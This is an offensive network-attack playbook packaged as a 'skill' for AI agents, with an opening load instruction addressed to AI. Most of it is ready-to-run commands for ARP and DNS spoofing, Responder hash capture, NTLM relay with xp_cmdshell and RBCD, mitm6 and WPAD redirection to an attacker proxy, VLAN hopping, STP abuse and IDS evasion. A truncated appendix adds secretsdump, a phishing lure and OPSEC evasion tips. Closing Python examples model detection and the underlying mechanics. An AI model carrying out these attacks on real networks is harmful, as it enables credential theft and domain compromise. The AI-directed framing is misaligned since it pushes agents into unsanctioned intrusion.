# SKILL: Network Protocol Attacks — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.

Source: [yaklang/hack-skills, `skills/network-protocol-attacks/SKILL.md`](https://github.com/yaklang/hack-skills/blob/HEAD/skills/network-protocol-attacks/SKILL.md), imported by @skillopedia on 2026-06-05. The attached reference `NAME_RESOLUTION_POISONING.md` survived only in part; its tail is reproduced in the appendix at the end of this page.

## 0. RELATED ROUTING

Before going deep, consider loading:

- [tunneling-and-pivoting](../tunneling-and-pivoting/SKILL.md) after establishing a MitM position, for traffic redirection
- [ntlm-relay-coercion](../ntlm-relay-coercion/SKILL.md) for relaying the NTLM authentications captured by poisoning attacks
- [unauthorized-access-common-services](../unauthorized-access-common-services/SKILL.md) for exploiting services discovered during network attacks
- [traffic-analysis-pcap](../traffic-analysis-pcap/SKILL.md) for analyzing traffic captured while in MitM position

### Advanced Reference

Also load [NAME_RESOLUTION_POISONING.md](./NAME_RESOLUTION_POISONING.md) when you need:

- Detailed Responder/mitm6 configuration and workflows
- NTLM relay target selection and chaining
- Credential format analysis and cracking priorities

---

## 1. ARP SPOOFING

### Gratuitous ARP — MitM Positioning

Unsolicited ARP replies rewrite the victim's and the gateway's ARP caches so that both map the other's IP to the attacker's MAC. IP forwarding must be enabled first; otherwise the victim loses connectivity and the attack is noticed immediately.

```bash
# arpspoof (dsniff suite) — poison both directions
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

# ettercap — ARP poisoning with sniffing
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//

# bettercap — modern framework
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on
```

### Selective Targeting

```bash
# bettercap — target specific hosts, avoid poisoning the whole segment
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true   # also poison the gateway's view of the targets
> set arp.spoof.internal true     # also intercept target-to-target traffic on the local subnet
> arp.spoof on
```

### Detection Indicators

- The same MAC address bound to two or more IPs in the ARP table (the attacker claiming both victim and gateway)
- An IP, typically the gateway, flipping from its known MAC to a new one
- Bursts of unsolicited ARP replies for the gateway IP from a non-gateway station
- Controls: `arpwatch`, static ARP entries for the gateway, Dynamic ARP Inspection backed by DHCP snooping, 802.1X port authentication

---

## 2. LLMNR / NBT-NS / mDNS POISONING

### Responder — Credential Capture

```bash
# Basic poisoning (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv

# Key flags:
# -d  Answer DHCP broadcast requests and inject a WPAD server into the DHCP reply (noisy: touches every DHCP client on the segment)
# -w  Start the rogue WPAD proxy server
# -P  Force NTLM (transparent) or Basic (prompt) authentication on the proxy
# -v  Verbose

# Analyze mode only (passive, no poisoning) — run this first
responder -I eth0 -A
```

### Captured Hash Formats

| Protocol | Hash Type | Hashcat Mode | Crackability |
|---|---|---|---|
| NTLMv1 | NetNTLMv1 | 5500 | Fast — with Responder's static challenge `1122334455667788` (Responder.conf) the response can be turned into the raw NT hash, so rainbow tables / crack.sh apply |
| NTLMv1-ESS | NetNTLMv1-ESS | 5500 | Fast — same as NTLMv1 once the ESS/SSP response is converted (e.g. `ntlmv1-multi`) |
| NTLMv2 | NetNTLMv2 | 5600 | Moderate — HMAC-MD5 over a per-session server challenge plus client blob, so no precomputation; dictionary + rules only |

```bash
# Crack captured hashes
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
```

### Relay Instead of Crack

NTLM challenge-response cannot be replayed from a file: relaying works only while the victim's authentication is in flight. Turn Responder's SMB and HTTP servers off in `Responder.conf` so `ntlmrelayx` can bind those ports, and run both tools side by side.

```bash
# ntlmrelayx — relay incoming NTLM authentication to other services
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access          # RBCD attack
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"
```

---

## 3. WPAD ABUSE

```bash
# Responder with WPAD proxy
responder -I eth0 -wPv

# WPAD flow:
# 1. Client asks DHCP (option 252) for WPAD → then DNS for wpad.domain.com → then LLMNR/NBT-NS
#    (Windows DNS servers block "wpad" via the Global Query Block List, which is why the LLMNR/NBT-NS fallback fires)
# 2. Responder answers with a rogue wpad.dat
# 3. Browser uses the attacker's proxy → forced NTLM auth → credential capture
```

### Manual WPAD PAC File

```javascript
// Rogue wpad.dat content: route everything through the attacker, fall back to DIRECT if the proxy is down
function FindProxyForURL(url, host) {
  return "PROXY ATTACKER_IP:3128; DIRECT";
}
```

---

## 4. DHCPv6 ATTACK — mitm6

Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default, and Windows prefers an IPv6 DNS server over an IPv4 one once it has one.

```bash
# mitm6 → DNS takeover → NTLM relay
mitm6 -d domain.com

# In parallel: relay captured NTLM to LDAP(S) for delegation
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access

# Attack chain:
# 1. mitm6 answers DHCPv6 → sets the attacker as the victim's IPv6 DNS server
# 2. Victim DNS queries go to the attacker → WPAD redirect to the attacker's host
# 3. Forced NTLM auth → relay to LDAP → create a machine account and configure RBCD
```

### Key Conditions

- SMB signing disabled on targets (for SMB relay)
- LDAP signing not required on the DC (for LDAP relay); LDAPS channel binding not enforced (for LDAPS relay)
- `ms-DS-MachineAccountQuota` > 0 (for machine account creation; default is 10)

---

## 5. VLAN HOPPING

### Switch Spoofing (DTP)

```bash
# yersinia — DTP attack to negotiate a trunk
yersinia dtp -attack 1 -interface eth0

# frogger.sh — automated VLAN hopping via DTP
./frogger.sh
# Sends DTP frames → switch enables trunking → access all VLANs

# After the trunk is established, create a tagged subinterface for the target VLAN
modprobe 8021q
ip link add link eth0 name eth0.TARGET_VLAN type vlan id TARGET_VLAN   # vconfig is deprecated and often absent
ip addr add 10.10.10.1/24 dev eth0.TARGET_VLAN
ip link set eth0.TARGET_VLAN up
```

### Double Tagging (802.1Q)

Craft a frame with two 802.1Q tags: outer = the trunk's native VLAN, inner = the target VLAN. The first switch strips the outer (native) tag and forwards the frame untagged over the trunk; the next switch reads the inner tag and delivers the frame into the target VLAN.

```python
# scapy
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")
```

- Limitation: one-way only (responses go to the real gateway)
- Effective for blind attacks (e.g., targeting a server)

### Mitigation

- Disable DTP: `switchport nonegotiate`
- Set the native VLAN to an unused one: `switchport trunk native vlan 999`
- Prune VLANs: only allow needed VLANs on trunk ports

---

## 6. STP MANIPULATION

### Root Bridge Claim

```bash
# yersinia — claim root bridge with lowest priority
yersinia stp -attack 4 -interface eth0

# Send BPDUs with priority 0 → become root bridge
# Inter-switch traffic re-converges through the attacker's links
```

Becoming root only reshapes the tree. Actual MitM requires the attacker to be connected to two switches so that the path between them runs through the attacker (yersinia attack 6, "Claiming Root Role with MitM"); a single-homed host that becomes root mostly causes re-convergence and outages.

### Topology Change Attack

```bash
# Send TC (Topology Change) BPDUs → force MAC table flush
yersinia stp -attack 1 -interface eth0
# Switches flood all ports temporarily → sniff traffic
```

### Mitigation

- BPDU Guard on access ports
- Root Guard on ports that must never become the root port
- `spanning-tree portfast bpduguard enable`

---

## 7. DNS SPOOFING

### On-Path DNS Response Spoofing

With an ARP MitM in place the attacker sees each query and answers it before the real resolver does; no cache poisoning is involved.

```bash
# bettercap DNS spoofing
bettercap -iface eth0
> set dns.spoof.domains target.com, *.target.com
> set dns.spoof.address ATTACKER_IP
> dns.spoof on

# ettercap DNS spoofing (via etter.dns config)
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
```

### Kaminsky Attack Variant

Off-path cache poisoning: flood a recursive resolver with forged responses for random subdomains, guessing the 16-bit transaction ID, each carrying an authority section that delegates the whole zone's NS to an attacker-controlled server. Source-port randomization (standard since 2008) and DNSSEC make this impractical against a modern resolver.

---

## 8. IPv6 ATTACKS

### Router Advertisement Spoofing

```bash
# Send rogue RA → victim configures the attacker as default gateway
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64

# THC-IPv6 suite for comprehensive IPv6 attacks
atk6-parasite6 eth0        # ICMPv6 neighbor spoofing (the IPv6 equivalent of ARP spoofing)
atk6-redir6 eth0 ...       # Traffic redirection via ICMPv6 redirect
```

### SLAAC Abuse

```bash
# Advertise a rogue prefix → victim auto-configures an IPv6 address from it
# Combined with a rogue DNS server (RA RDNSS option or DHCPv6) → full MitM over IPv6
# Windows prioritizes IPv6 over IPv4 by default
```

---

## 9. IDS/IPS EVASION

| Technique | Method | Tool/Flag |
|---|---|---|
| IP Fragmentation | Split the payload across fragments so no single packet contains the signature | `nmap -f`, `fragroute` (`ip_frag 8`) |
| TTL Manipulation (insertion) | Interleave chaff packets whose TTL expires between the IDS and the target; the IDS accepts data the target never receives and its stream reassembly desynchronizes | `fragroute` (`ip_chaff <ttl>`) |
| Encoding Evasion | URL/Unicode/hex encoding | Manual, custom scripts |
| Session Splicing | Split the TCP payload across many small segments | `fragroute` (`tcp_seg 1`) |
| Timing-Based | Slow scan to avoid rate-based detection | `nmap -T0`, `nmap -T1` |
| Decoy Scanning | Mix the real scan with decoy source IPs | `nmap -D RND:10` |
| Idle/Zombie Scan | Use an idle host as scan proxy | `nmap -sI ZOMBIE_IP` |

```bash
# fragroute — fragment and reorder packets
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP

# nmap evasion combinations (--mtu replaces -f; do not combine them, and --mtu must be a multiple of 8)
# --data-length pads probes with random bytes to dodge size-based signatures
nmap -sS --mtu 24 --data-length 50 -D RND:5 -T2 TARGET
```

---

## 10. DECISION TREE

```
Network access obtained — want to escalate via network attacks
│
├── On same broadcast domain as targets?
│   ├── YES → ARP spoof for MitM (§1)
│   │         └── Capture plaintext creds or redirect traffic
│   └── NO  → need VLAN hopping first (§5)
│             ├── DTP enabled?      → switch spoofing
│             └── Know native VLAN? → double tagging
│
├── Windows environment?
│   ├── LLMNR/NBT-NS enabled? (default YES)
│   │   └── Run Responder (§2) → capture NetNTLM hashes
│   │       ├── NTLMv1? → crack fast or relay
│   │       └── NTLMv2? → relay (§2) or crack with rules
│   │
│   ├── WPAD configured or auto-detect? → WPAD abuse (§3)
│   │
│   └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│       └── LDAP relay → RBCD → domain compromise
│
├── Need DNS control?
│   ├── MitM already established? → DNS spoofing (§7)
│   └── DHCPv6 available?         → mitm6 for DNS takeover (§4)
│
├── Managed switches with weak config?
│   ├── BPDU Guard off? → STP root bridge claim (§6)
│   └── DTP enabled?    → VLAN hopping (§5)
│
├── IPv6 attack surface?
│   └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
│
└── IDS/IPS in path?
    └── Apply evasion techniques (§9) — fragmentation, timing, encoding
```

---

## APPENDIX: NAME_RESOLUTION_POISONING.md (attached reference, tail only)

Only the end of the attached file is present on this page; the earlier sections it is routed to for (Responder/mitm6 workflows, relay chaining, cracking priorities) did not survive extraction. The first block below begins mid-command.

```bash
:'PASSWORD' -dc-ip DC_IP

# 2. Use ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass TARGET.domain.com
```

---

### 5. TROUBLESHOOTING

| Issue | Cause | Fix |
|---|---|---|
| No hashes captured | LLMNR/NBT-NS disabled via GPO | Try mitm6 (DHCPv6 is harder to disable) |
| Only machine accounts | Machines query more than users | Wait, trigger user queries (e.g., phish link to `\\attacker\share`) |
| Relay fails "signing required" | Target enforces SMB signing | Relay to LDAP/HTTP/MSSQL instead |
| mitm6 no response | IPv6 disabled on target | Fall back to LLMNR/WPAD |
| NTLMv2 won't crack | Strong password | Use relay, don't waste time cracking |
| Responder conflicts | Another LLMNR responder on network | Check for legitimate WPAD/LLMNR, use `-A` mode first |

---

### 6. OPSEC CONSIDERATIONS

- Run Responder in analyze mode (`-A`) first to assess traffic
- Limit poisoning to specific targets to reduce noise
- Use the `--lm` flag in Responder only if an NTLMv1 downgrade is needed
- mitm6 affects all hosts on the segment — use `-hw` to filter targets
- Clean up DHCPv6 leases after the attack (they persist ~300 seconds)
- Monitor for AV/EDR alerting on tool signatures
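The detection indicators listed under §1 (one MAC owning two IPs, an IP flipping to a new MAC, bursts of unsolicited replies for the gateway) can be checked mechanically over an ARP trace. The following is an added example written for this page, not code from the playbook or from `arpwatch`; the trace, the addresses and the thresholds are constructed, and the records stand in for ARP frames seen on a monitor port.

```python
from collections import defaultdict

# Constructed trace: (seconds, sender IP, sender MAC, is_reply). Records 1-2 are the legitimate
# gateway (10.0.0.1) and victim (10.0.0.50); from t=10 an attacker MAC claims both IPs, the way
# "arpspoof -t VICTIM GATEWAY" and "arpspoof -t GATEWAY VICTIM" do, repeating every second or two.
ARP_TRACE = [
    (0.0,  "10.0.0.1",  "00:11:22:33:44:01", True),
    (0.5,  "10.0.0.50", "00:11:22:33:44:50", True),
    (10.0, "10.0.0.1",  "aa:bb:cc:dd:ee:ee", True),   # forged reply: gateway IP, attacker MAC
    (10.0, "10.0.0.50", "aa:bb:cc:dd:ee:ee", True),   # forged reply: victim IP, attacker MAC
    (11.0, "10.0.0.1",  "aa:bb:cc:dd:ee:ee", True),
    (12.0, "10.0.0.1",  "aa:bb:cc:dd:ee:ee", True),
    (12.0, "10.0.0.50", "aa:bb:cc:dd:ee:ee", True),
]


def detect_arp_poisoning(trace, burst_window=5.0, burst_threshold=3):
    """arpwatch-style heuristics over a trace of ARP frames.

    Returns a dict with three alert lists:
      flipflop : (ip, previous_mac, new_mac) when an IP changes its MAC binding
      multi_ip : (mac, [ips]) when one MAC claims more than one IP
      burst    : ip that received >= burst_threshold unsolicited replies within burst_window seconds
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    reply_times = defaultdict(list)
    alerts = {"flipflop": [], "multi_ip": [], "burst": []}

    for ts, sender_ip, sender_mac, is_reply in trace:
        sender_mac = sender_mac.lower()

        # 1. binding flip-flop: the IP was seen with a different MAC before
        known = ip_to_mac.get(sender_ip)
        if known is not None and known != sender_mac:
            alerts["flipflop"].append((sender_ip, known, sender_mac))
        ip_to_mac[sender_ip] = sender_mac

        # 2. one station claiming several IPs (attacker impersonating victim AND gateway)
        mac_to_ips[sender_mac].add(sender_ip)
        if len(mac_to_ips[sender_mac]) > 1 and sender_mac not in [m for m, _ in alerts["multi_ip"]]:
            alerts["multi_ip"].append((sender_mac, sorted(mac_to_ips[sender_mac])))

        # 3. reply storm: poisoning tools re-send replies continuously to keep the cache poisoned
        if is_reply:
            recent = [t for t in reply_times[sender_ip] + [ts] if ts - t <= burst_window]
            reply_times[sender_ip] = recent
            if len(recent) >= burst_threshold and sender_ip not in alerts["burst"]:
                alerts["burst"].append(sender_ip)

    return alerts


if __name__ == "__main__":
    for kind, items in detect_arp_poisoning(ARP_TRACE).items():
        print(kind, items)
```

The flip-flop rule fires on the first forged reply for each IP, the multi-IP rule as soon as the attacker has claimed both sides, and the burst rule only after the re-sends accumulate; a legitimate host that changes its NIC trips the first rule once and nothing else, which is the usual false-positive to whitelist.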
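The double-tagging attack in §5 and the native-VLAN mitigation under it are easiest to understand by building the frame byte by byte and replaying what the access switch does with it. This is an added example written for this page, not code from the playbook or from scapy; the MACs, VLAN numbers and the 20-byte dummy payload are constructed, and `switch_forward` is a deliberately minimal model of the native-VLAN rule, not of a particular switch OS.

```python
import struct

ETH_P_8021Q = 0x8100   # TPID of an 802.1Q tag
ETH_P_IP = 0x0800


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def dot1q_tag(vlan: int, pcp: int = 0, dei: int = 0) -> bytes:
    """4-byte 802.1Q tag: TPID 0x8100 followed by TCI = PCP(3) | DEI(1) | VID(12)."""
    tci = (pcp << 13) | (dei << 12) | (vlan & 0x0FFF)
    return struct.pack("!HH", ETH_P_8021Q, tci)


def build_double_tagged(dst: str, src: str, outer_vlan: int, inner_vlan: int,
                        payload: bytes, ethertype: int = ETH_P_IP) -> bytes:
    """Ethernet frame with two stacked tags: outer = native VLAN of the trunk, inner = target VLAN."""
    return mac(dst) + mac(src) + dot1q_tag(outer_vlan) + dot1q_tag(inner_vlan) + struct.pack("!H", ethertype) + payload


def parse_tags(frame: bytes):
    """Return (list of VLAN IDs outermost first, inner EtherType, payload)."""
    vlans, pos = [], 12
    while struct.unpack("!H", frame[pos:pos + 2])[0] == ETH_P_8021Q:
        tci = struct.unpack("!H", frame[pos + 2:pos + 4])[0]
        vlans.append(tci & 0x0FFF)
        pos += 4
    ethertype = struct.unpack("!H", frame[pos:pos + 2])[0]
    return vlans, ethertype, frame[pos + 2:]


def switch_forward(frame: bytes, trunk_native_vlan: int) -> int:
    """Model of the path from the attacker's access port (in the native VLAN) across a trunk to a second switch.

    The trunk carries the native VLAN untagged, so the first switch pops the leading tag only when it
    equals the native VLAN. The second switch then classifies the frame by whatever tag is left.
    Returns the VLAN the frame is finally delivered into."""
    vlans, _, _ = parse_tags(frame)
    if vlans and vlans[0] == trunk_native_vlan:
        frame = frame[:12] + frame[16:]          # pop the outer tag, inner tag now leads
    vlans, _, _ = parse_tags(frame)
    return vlans[0] if vlans else trunk_native_vlan


if __name__ == "__main__":
    frame = build_double_tagged("ff:ff:ff:ff:ff:ff", "02:00:00:00:00:01", 1, 100, b"\x45" + b"\x00" * 19)
    print("tags on the wire:", parse_tags(frame)[0])
    print("native VLAN 1   -> delivered into VLAN", switch_forward(frame, trunk_native_vlan=1))
    print("native VLAN 999 -> delivered into VLAN", switch_forward(frame, trunk_native_vlan=999))
```

With the trunk's native VLAN left at 1 the frame pops out in VLAN 100; with `switchport trunk native vlan 999` the outer tag no longer matches, nothing is stripped, and the frame stays in VLAN 1. The model also shows why the hop is one-way: the reply from VLAN 100 carries a single tag and is never double-tagged back to the attacker.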
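The first row of the §9 table, IP fragmentation, works because a signature that straddles fragment boundaries never appears in any single packet. The following added example (written for this page, not taken from nmap, fragroute or the playbook) fragments an IPv4/TCP datagram into 8-byte pieces the way `nmap -f` and `fragroute ip_frag 8` do, then runs a per-packet matcher and a reassembling matcher over the same fragments. Addresses, the HTTP request and the signature are constructed.

```python
import struct


def ip_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; over a valid header including its checksum field it yields 0."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def ipv4_header(src: bytes, dst: bytes, total_len: int, ident: int, flags_frag: int,
                proto: int = 6, ttl: int = 64) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, flags_frag, ttl, proto, 0, src, dst)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]


def fragment(src: bytes, dst: bytes, ident: int, transport: bytes, mtu_payload: int = 8):
    """Split the transport segment into IP fragments of mtu_payload bytes (must be a multiple of 8).
    Every fragment carries the same identification; all but the last set the More Fragments flag."""
    assert mtu_payload % 8 == 0
    frags = []
    for off in range(0, len(transport), mtu_payload):
        chunk = transport[off:off + mtu_payload]
        more = off + mtu_payload < len(transport)
        flags_frag = ((1 if more else 0) << 13) | (off // 8)     # MF is bit 13, offset in 8-byte units
        frags.append(ipv4_header(src, dst, 20 + len(chunk), ident, flags_frag) + chunk)
    return frags


def more_fragments(packet: bytes) -> bool:
    return bool(struct.unpack("!H", packet[6:8])[0] & 0x2000)


def naive_signature_match(packets, signature: bytes) -> bool:
    """Per-packet inspection, i.e. an IDS that does not reassemble IP fragments."""
    return any(signature in p[20:] for p in packets)


def reassemble(fragments) -> bytes:
    """Minimal reassembly of one datagram: order by fragment offset, refuse gaps and overlaps."""
    pieces = {}
    for p in fragments:
        flags_frag = struct.unpack("!H", p[6:8])[0]
        pieces[(flags_frag & 0x1FFF) * 8] = p[20:]
    data = b""
    for off in sorted(pieces):
        if off != len(data):
            raise ValueError("gap or overlap at offset %d" % off)
        data += pieces[off]
    return data


def reassembling_match(packets, signature: bytes) -> bool:
    return signature in reassemble(packets)


def demo_fragments(mtu_payload: int = 8):
    """Constructed datagram: TCP header (PSH|ACK, checksum left zero) plus a request an IDS would flag."""
    src, dst = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 80])
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 0x50, 0x18, 8192, 0, 0)
    transport = tcp + b"GET /etc/passwd HTTP/1.0\r\n\r\n"
    return transport, fragment(src, dst, 0x1234, transport, mtu_payload)


def demo(mtu_payload: int = 8):
    """Returns (naive matcher hit, reassembling matcher hit) for the signature b'/etc/passwd'."""
    _, frags = demo_fragments(mtu_payload)
    return naive_signature_match(frags, b"/etc/passwd"), reassembling_match(frags, b"/etc/passwd")


if __name__ == "__main__":
    print("8-byte fragments :", demo(8))
    print("single datagram  :", demo(48))
```

With 8-byte fragments the 11-byte signature can never sit inside one packet, so the per-packet matcher misses while the reassembler sees the full request; unfragmented (`demo(48)`) both hit. The reassembler also accepts the fragments in any order, which is what defeats `fragroute`'s `order random` on a properly configured sensor, and rejecting overlaps is where the classic Ptacek-Newsham ambiguity (which copy does the target keep?) has to be resolved the same way the protected host does.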